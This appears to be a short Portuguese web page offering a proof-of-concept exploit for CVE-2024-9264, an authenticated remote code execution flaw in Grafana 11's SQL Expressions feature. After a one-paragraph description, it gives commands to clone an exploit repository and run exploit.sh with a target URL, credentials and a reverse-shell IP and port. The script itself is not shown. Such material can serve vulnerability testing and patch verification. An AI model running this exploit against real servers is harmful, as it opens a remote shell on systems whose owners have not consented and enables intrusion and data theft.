
RCE autenticado no Grafana (v11.0) via Expressões SQL - Exploit de PoC
RCE autenticado no Grafana (v11.0) via Expressões SQL - Exploit PoC
CVE-2024-9264 - Grafana v11.0
Execução Remota de Código Autenticada (RCE)
PoC
CVE-2024-9264 é uma falha crítica de execução remota de código e inclusão de arquivos locais introduzida no recurso experimental “Expressões SQL” do Grafana 11. A API passa SQL fornecido pelo usuário diretamente para a CLI do DuckDB sem sanitização adequada, portanto qualquer conta autenticada com privilégios de Viewer ou superiores pode injetar comandos de shell ou ler arquivos arbitrários, desde que o binário duckdb esteja no PATH do servidor.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Exemplo:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337